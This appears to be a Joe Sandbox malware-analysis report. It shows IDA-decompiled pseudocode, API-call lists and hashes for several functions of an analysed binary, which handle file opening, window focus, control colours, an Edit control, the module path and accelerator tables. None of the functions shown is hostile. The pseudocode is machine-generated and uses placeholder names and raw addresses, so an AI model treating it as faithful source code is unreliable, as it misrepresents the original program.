                                                                                                                                                  • Opcode ID: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                                                                                                                                  • Instruction ID: 95a633425f538de9a54c52fb3ff2f65ec4db39112d0deefb15a4c97684d4ca47
                                                                                                                                                  • Opcode Fuzzy Hash: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                                                                                                                                  • Instruction Fuzzy Hash: 900192B5500308BFCB119F55DD84E8A7BB8FB44760F20C626F925672D1C374D950CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406060(long __eax, CHAR* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				void* _v4;
                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  				long _t26;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  
                                                                                                                                                  				_t23 =  *0x40b43c; // 0x20405a8
                                                                                                                                                  				_t26 = __eax;
                                                                                                                                                  				_t25 = E0040662C(_t23, _a4);
                                                                                                                                                  				if(_t26 != 1) {
                                                                                                                                                  					if(_t26 != 2) {
                                                                                                                                                  						if(_t26 != 3) {
                                                                                                                                                  							_t27 = _v4;
                                                                                                                                                  							goto L8;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                  							if(_t27 != 0xffffffff) {
                                                                                                                                                  								goto L9;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t27 = CreateFileA(__ebx, 0x40000000, 1, 0, 5, 0, 0);
                                                                                                                                                  								goto L8;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 4, 0x80, 0);
                                                                                                                                                  						goto L8;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t27 = CreateFileA(__ebx, 0x80000000, _t26, 0, 3, 0x80, 0);
                                                                                                                                                  					L8:
                                                                                                                                                  					if(_t27 == 0xffffffff) {
                                                                                                                                                  						L13:
                                                                                                                                                  						if(_a4 == 0xffffffff) {
                                                                                                                                                  							_t13 =  *0x40b43c; // 0x20405a8
                                                                                                                                                  							E004066BB(_t13, _t25);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						L9:
                                                                                                                                                  						if(_t27 == 0) {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *_t25 = _t27;
                                                                                                                                                  							_t24 =  *0x40b0f8; // 0x2040000
                                                                                                                                                  							 *((intOrPtr*)(_t25 + 4)) = RtlAllocateHeap(_t24, 0, 0x1000);
                                                                                                                                                  							 *(_t25 + 8) = 0x1000;
                                                                                                                                                  							 *(_t25 + 0xc) = 0;
                                                                                                                                                  							 *(_t25 + 0x14) = 1;
                                                                                                                                                  							if(_v4 != 0xffffffff) {
                                                                                                                                                  								return _t27;
                                                                                                                                                  							} else {
                                                                                                                                                  								return _t25;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  0x00406061
                                                                                                                                                  0x0040606a
                                                                                                                                                  0x0040607a
                                                                                                                                                  0x0040607c
                                                                                                                                                  0x0040609d
                                                                                                                                                  0x004060bf
                                                                                                                                                  0x004060f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004060c1
                                                                                                                                                  0x004060dc
                                                                                                                                                  0x004060e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004060e3
                                                                                                                                                  0x004060f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004060f5
                                                                                                                                                  0x004060e1
                                                                                                                                                  0x0040609f
                                                                                                                                                  0x004060b8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004060b8
                                                                                                                                                  0x0040607e
                                                                                                                                                  0x00406096
                                                                                                                                                  0x004060fd
                                                                                                                                                  0x00406100
                                                                                                                                                  0x00406149
                                                                                                                                                  0x0040614e
                                                                                                                                                  0x00406150
                                                                                                                                                  0x00406157
                                                                                                                                                  0x00406157
                                                                                                                                                  0x00406162
                                                                                                                                                  0x00406102
                                                                                                                                                  0x00406102
                                                                                                                                                  0x00406104
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406106
                                                                                                                                                  0x0040610b
                                                                                                                                                  0x0040610d
                                                                                                                                                  0x00406121
                                                                                                                                                  0x00406124
                                                                                                                                                  0x0040612b
                                                                                                                                                  0x00406132
                                                                                                                                                  0x00406139
                                                                                                                                                  0x00406148
                                                                                                                                                  0x0040613b
                                                                                                                                                  0x00406141
                                                                                                                                                  0x00406141
                                                                                                                                                  0x00406139
                                                                                                                                                  0x00406104
                                                                                                                                                  0x00406100

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,020405A8,?,?,?,020412D0,?,00406244,00000001,00000001), ref: 00406090
                                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,020405A8,?,?,?,020412D0,?,00406244,00000001,00000001), ref: 004060B2
                                                                                                                                                  • RtlAllocateHeap.NTDLL(02040000,00000000,00001000), ref: 00406116
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2813278966-0
                                                                                                                                                  • Opcode ID: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                                                                                                                                  • Instruction ID: 22e7740ac045cd4ad30a1761b82f9b87c0991fe1563c31a0c7e75b116f9b4f37
                                                                                                                                                  • Opcode Fuzzy Hash: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                                                                                                                                  • Instruction Fuzzy Hash: 7321D67278031176E2309B28AC46F57B358A744B71F22873AF762BB2C0C7B5AC64479D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405BB5(struct HWND__* _a4, intOrPtr* _a8) {
                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                  				struct HWND__* _t16;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t16 = _a4;
                                                                                                                                                  				_t15 = 1;
                                                                                                                                                  				if(IsWindowEnabled(_t16) != 0 && IsWindowVisible(_t16) != 0 && (GetWindowLongA(_t16, 0xfffffff0) & 0x00010000) != 0) {
                                                                                                                                                  					_t18 = _a8;
                                                                                                                                                  					if( *((intOrPtr*)(_t18 + 8)) == 0) {
                                                                                                                                                  						_t11 =  *_t18;
                                                                                                                                                  						if(_t11 != 0) {
                                                                                                                                                  							if(_t11 == _t16) {
                                                                                                                                                  								goto L8;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							SetFocus(_t16);
                                                                                                                                                  							_t15 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						SetFocus(_t16);
                                                                                                                                                  						_t15 = 0;
                                                                                                                                                  						L8:
                                                                                                                                                  						 *((intOrPtr*)(_t18 + 8)) = _t15;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}







                                                                                                                                                  0x00405bb7
                                                                                                                                                  0x00405bbe
                                                                                                                                                  0x00405bc7
                                                                                                                                                  0x00405be5
                                                                                                                                                  0x00405bed
                                                                                                                                                  0x00405bfa
                                                                                                                                                  0x00405bfe
                                                                                                                                                  0x00405c0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c00
                                                                                                                                                  0x00405c01
                                                                                                                                                  0x00405c07
                                                                                                                                                  0x00405c07
                                                                                                                                                  0x00405bef
                                                                                                                                                  0x00405bf0
                                                                                                                                                  0x00405bf6
                                                                                                                                                  0x00405c0f
                                                                                                                                                  0x00405c0f
                                                                                                                                                  0x00405c0f
                                                                                                                                                  0x00405c12
                                                                                                                                                  0x00405c17

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Focus$EnabledLongVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1625685152-0
                                                                                                                                                  • Opcode ID: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                                                                                                                                  • Instruction ID: c6146cca50ef5e8f765ec7b6592dd4ff06736dc7ed718ebd510666ced0979e75
                                                                                                                                                  • Opcode Fuzzy Hash: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                                                                                                                                  • Instruction Fuzzy Hash: D0F049302087015FE7215F659D8876B72B8FF95755714843EF151F21D0C778D891DA1E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040416A(intOrPtr _a4, intOrPtr _a12, struct HDC__* _a16) {
                                                                                                                                                  				long _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				struct HDC__* _t17;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				struct HBRUSH__* _t25;
                                                                                                                                                  
                                                                                                                                                  				_t25 = 0xd0d0d0d1;
                                                                                                                                                  				if(_a12 == 0x138) {
                                                                                                                                                  					_t17 = _a16;
                                                                                                                                                  					_t23 = _a4;
                                                                                                                                                  					_t9 =  *(_t23 + 0x14);
                                                                                                                                                  					if(_t9 != 0xffffffff) {
                                                                                                                                                  						SetTextColor(_t17, _t9);
                                                                                                                                                  						if( *(_t23 + 0x10) == 0xffffffff) {
                                                                                                                                                  							SetBkColor(_t17, GetSysColor(0xf));
                                                                                                                                                  							_t25 = GetSysColorBrush(0xf);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t10 =  *(_t23 + 0x10);
                                                                                                                                                  					if(_t10 != 0xffffffff) {
                                                                                                                                                  						SetBkColor(_t17, _t10);
                                                                                                                                                  						_t25 =  *((intOrPtr*)(_t23 + 0x18));
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t25;
                                                                                                                                                  			}








                                                                                                                                                  0x00404173
                                                                                                                                                  0x00404178
                                                                                                                                                  0x0040417b
                                                                                                                                                  0x00404180
                                                                                                                                                  0x00404184
                                                                                                                                                  0x00404191
                                                                                                                                                  0x00404195
                                                                                                                                                  0x0040419f
                                                                                                                                                  0x004041ab
                                                                                                                                                  0x004041b5
                                                                                                                                                  0x004041b5
                                                                                                                                                  0x0040419f
                                                                                                                                                  0x004041b7
                                                                                                                                                  0x004041bd
                                                                                                                                                  0x004041c1
                                                                                                                                                  0x004041c3
                                                                                                                                                  0x004041c3
                                                                                                                                                  0x004041c8
                                                                                                                                                  0x004041cc

                                                                                                                                                  APIs
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00404195
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 004041A3
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushText
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3324192670-0
                                                                                                                                                  • Opcode ID: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                                                                                                                                  • Instruction ID: d8e8ad06d9decbb24c27d3cc026bde09b1a35479a682271e2c605a4ee8a6c308
                                                                                                                                                  • Opcode Fuzzy Hash: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                                                                                                                                  • Instruction Fuzzy Hash: CDF044B1100304ABD220AB299C48967B3FCEBA4331F004B36FA75E32D1C774AC558A66
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004043AE(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                  				long _t23;
                                                                                                                                                  				signed int _t27;
                                                                                                                                                  				struct HWND__* _t29;
                                                                                                                                                  				struct HWND__** _t31;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_t31 = E0040642D( *0x40b428);
                                                                                                                                                  				if( *0x40b30c == 0) {
                                                                                                                                                  					memset(0x40b278, 0, 0x94);
                                                                                                                                                  					 *0x40b278 = 2;
                                                                                                                                                  					 *0x40b27c = 0x94;
                                                                                                                                                  					 *0x40b280 = E004042DD;
                                                                                                                                                  					 *0x40b2f0 = E00404680;
                                                                                                                                                  					 *0x40b2f4 = E004046DA;
                                                                                                                                                  					 *0x40b284 = E00404700;
                                                                                                                                                  					 *0x40b30c = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a24 == 0) {
                                                                                                                                                  					_a24 = 0x409000;
                                                                                                                                                  				}
                                                                                                                                                  				_t27 = _a28;
                                                                                                                                                  				_t28 = _t27 | 0x50030080;
                                                                                                                                                  				_t29 = CreateWindowExA( !(_t27 >> 8) & 0x00000200, "Edit", _a24, _t27 | 0x50030080, _a8, _a12, _a16, _a20,  *_t31, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                  				if(_t29 != 0) {
                                                                                                                                                  					_t32 = E0040662C( *0x40b424, _a4);
                                                                                                                                                  					_t23 = SetWindowLongA(_t29, 0xfffffffc, E00404358);
                                                                                                                                                  					 *(_t32 + 0x14) =  *(_t32 + 0x14) | 0xffffffff;
                                                                                                                                                  					 *(_t32 + 0x10) =  *(_t32 + 0x10) | 0xffffffff;
                                                                                                                                                  					 *0x40b270 = _t23;
                                                                                                                                                  					_t29 = E004047BB(_t28, _a4, _t32, _t29, 0x40b278);
                                                                                                                                                  				}
                                                                                                                                                  				return _t29;
                                                                                                                                                  			}








                                                                                                                                                  0x004043c6
                                                                                                                                                  0x004043cd
                                                                                                                                                  0x004043d8
                                                                                                                                                  0x004043e0
                                                                                                                                                  0x004043ea
                                                                                                                                                  0x004043f0
                                                                                                                                                  0x004043fa
                                                                                                                                                  0x00404404
                                                                                                                                                  0x0040440e
                                                                                                                                                  0x00404418
                                                                                                                                                  0x00404418
                                                                                                                                                  0x00404426
                                                                                                                                                  0x00404428
                                                                                                                                                  0x00404428
                                                                                                                                                  0x0040442f
                                                                                                                                                  0x00404440
                                                                                                                                                  0x0040446c
                                                                                                                                                  0x00404470
                                                                                                                                                  0x00404488
                                                                                                                                                  0x0040448a
                                                                                                                                                  0x00404490
                                                                                                                                                  0x00404494
                                                                                                                                                  0x0040449e
                                                                                                                                                  0x004044a8
                                                                                                                                                  0x004044a8
                                                                                                                                                  0x004044b0

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 004043D8
                                                                                                                                                  • CreateWindowExA.USER32(?,Edit,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404466
                                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,Function_00004358), ref: 0040448A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CreateLongmemset
                                                                                                                                                  • String ID: Edit
                                                                                                                                                  • API String ID: 2917088559-554135844
                                                                                                                                                  • Opcode ID: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                                                                                                                                  • Instruction ID: 6d6bdd9e0c8eed947640fc1b11ecc7fcd9f2bd5d8b727347204d49e96c7c13b5
                                                                                                                                                  • Opcode Fuzzy Hash: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                                                                                                                                  • Instruction Fuzzy Hash: 7A217CB1500205ABDB215F12ED09F5B3FB5EB84325F10823EF960B62E1D77988249B9C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00403A79(void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				long _t16;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  
                                                                                                                                                  				_t17 = E00407750(0x104, _a4);
                                                                                                                                                  				_t16 = GetModuleFileNameA( *0x40b0fc, _t17, 0x104);
                                                                                                                                                  				if(strcmp(_t17, "\\\\?\\") == 0) {
                                                                                                                                                  					_t2 = _t16 - 4; // -4
                                                                                                                                                  					_t3 = _t17 + 4; // 0x4
                                                                                                                                                  					memmove(_t17, _t3, _t2);
                                                                                                                                                  					_t16 = _t16 - 4;
                                                                                                                                                  				}
                                                                                                                                                  				_t8 = E004077F0(0x104 - _t16);
                                                                                                                                                  				 *((char*)(_t16 + _t17)) = 0;
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}






                                                                                                                                                  0x00403a8c
                                                                                                                                                  0x00403aa1
                                                                                                                                                  0x00403aac
                                                                                                                                                  0x00403aae
                                                                                                                                                  0x00403ab2
                                                                                                                                                  0x00403ab7
                                                                                                                                                  0x00403abf
                                                                                                                                                  0x00403abf
                                                                                                                                                  0x00403ac5
                                                                                                                                                  0x00403aca
                                                                                                                                                  0x00403ad1

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(021D0000,00000001,021D06F0,000040FF), ref: 00407797
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                                                                                                                                  • strcmp.MSVCRT ref: 00403AA3
                                                                                                                                                  • memmove.MSVCRT ref: 00403AB7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                                                                                                                                  • String ID: \\?\
                                                                                                                                                  • API String ID: 1538048364-4282027825
                                                                                                                                                  • Opcode ID: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                                                                                                                                  • Instruction ID: b2d6bd18301c6a615e078c624f6e571f893afb971f9df6f800e3a030ac3227e0
                                                                                                                                                  • Opcode Fuzzy Hash: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                                                                                                                                  • Instruction Fuzzy Hash: 90F027B36053016AD31066769D89E9B6B9CDF94364F104437F500E2182E638A91083B9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00404E09(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _t54;
                                                                                                                                                  				signed int _t55;
                                                                                                                                                  				struct tagACCEL* _t57;
                                                                                                                                                  				struct HACCEL__* _t64;
                                                                                                                                                  				int _t69;
                                                                                                                                                  				struct tagACCEL* _t82;
                                                                                                                                                  				void* _t84;
                                                                                                                                                  
                                                                                                                                                  				_v8 = 3;
                                                                                                                                                  				_t84 = E00406690( *0x40b42c, _a4);
                                                                                                                                                  				if(_t84 != 0) {
                                                                                                                                                  					if((_a8 & 0x00010000) != 0) {
                                                                                                                                                  						_v8 = 7;
                                                                                                                                                  					}
                                                                                                                                                  					if((_a8 & 0x00020000) != 0) {
                                                                                                                                                  						_v8 = _v8 | 0x00000008;
                                                                                                                                                  					}
                                                                                                                                                  					if((_a8 & 0x00040000) != 0) {
                                                                                                                                                  						_v8 = _v8 | 0x00000010;
                                                                                                                                                  					}
                                                                                                                                                  					_t69 =  *(_t84 + 0x10);
                                                                                                                                                  					_a8 = _a8 & 0x0000ffff;
                                                                                                                                                  					_t54 = 0;
                                                                                                                                                  					if(_t69 <= 0) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_t55 = _t69 + 1;
                                                                                                                                                  						 *(_t84 + 0x10) = _t55;
                                                                                                                                                  						if(_t55 != 1) {
                                                                                                                                                  							_t57 = RtlReAllocateHeap( *0x40b0f8, 0,  *(_t84 + 4), _t55 * 6);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t57 = RtlAllocateHeap( *0x40b0f8, 0, 6);
                                                                                                                                                  						}
                                                                                                                                                  						 *(_t84 + 4) = _t57;
                                                                                                                                                  						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 4)) = _a8;
                                                                                                                                                  						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 2)) = _a12;
                                                                                                                                                  						 *((char*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 6)) = _v8;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t82 =  *(_t84 + 4);
                                                                                                                                                  						while(_a8 != (_t82->key & 0x0000ffff) || _v8 != ( *_t82 & 0x000000ff)) {
                                                                                                                                                  							_t54 = _t54 + 1;
                                                                                                                                                  							_t82 = _t82 + 6;
                                                                                                                                                  							if(_t54 < _t69) {
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L12;
                                                                                                                                                  							}
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						 *((short*)( &( *(_t84 + 4)->cmd) + _t54 * 6)) = _a12;
                                                                                                                                                  					}
                                                                                                                                                  					L17:
                                                                                                                                                  					_t64 =  *(_t84 + 8);
                                                                                                                                                  					if(_t64 != 0) {
                                                                                                                                                  						DestroyAcceleratorTable(_t64);
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t84 + 8) = CreateAcceleratorTableA( *(_t84 + 4),  *(_t84 + 0x10));
                                                                                                                                                  				}
                                                                                                                                                  				return  *(_t84 + 8);
                                                                                                                                                  			}











                                                                                                                                                  0x00404e11
                                                                                                                                                  0x00404e23
                                                                                                                                                  0x00404e27
                                                                                                                                                  0x00404e34
                                                                                                                                                  0x00404e36
                                                                                                                                                  0x00404e36
                                                                                                                                                  0x00404e44
                                                                                                                                                  0x00404e46
                                                                                                                                                  0x00404e46
                                                                                                                                                  0x00404e51
                                                                                                                                                  0x00404e53
                                                                                                                                                  0x00404e53
                                                                                                                                                  0x00404e57
                                                                                                                                                  0x00404e5a
                                                                                                                                                  0x00404e61
                                                                                                                                                  0x00404e66
                                                                                                                                                  0x00404e84
                                                                                                                                                  0x00404e84
                                                                                                                                                  0x00404e8a
                                                                                                                                                  0x00404e8d
                                                                                                                                                  0x00404ec1
                                                                                                                                                  0x00404e8f
                                                                                                                                                  0x00404e99
                                                                                                                                                  0x00404e99
                                                                                                                                                  0x00404ecb
                                                                                                                                                  0x00404ed7
                                                                                                                                                  0x00404ee9
                                                                                                                                                  0x00404efa
                                                                                                                                                  0x00404e68
                                                                                                                                                  0x00404e68
                                                                                                                                                  0x00404e6b
                                                                                                                                                  0x00404e7c
                                                                                                                                                  0x00404e7d
                                                                                                                                                  0x00404e82
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404e82
                                                                                                                                                  0x00404eab
                                                                                                                                                  0x00404eab
                                                                                                                                                  0x00404efe
                                                                                                                                                  0x00404efe
                                                                                                                                                  0x00404f04
                                                                                                                                                  0x00404f07
                                                                                                                                                  0x00404f07
                                                                                                                                                  0x00404f19
                                                                                                                                                  0x00404f19
                                                                                                                                                  0x00404f21

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                                                                                                                                  • CreateAcceleratorTableA.USER32(?,?,?), ref: 00404F13
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1846328917-0
                                                                                                                                                  • Opcode ID: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                                                                                                                                  • Instruction ID: bc9dcee14bbf4dd975b3e87a1cfaf1458909dabdc56a66c9757580d18e599811
                                                                                                                                                  • Opcode Fuzzy Hash: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                                                                                                                                  • Instruction Fuzzy Hash: E8319E70100702DBC724CF24CA45A6ABBF5FF94704F10C82DE96AAB6A0E375EA50DB48
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

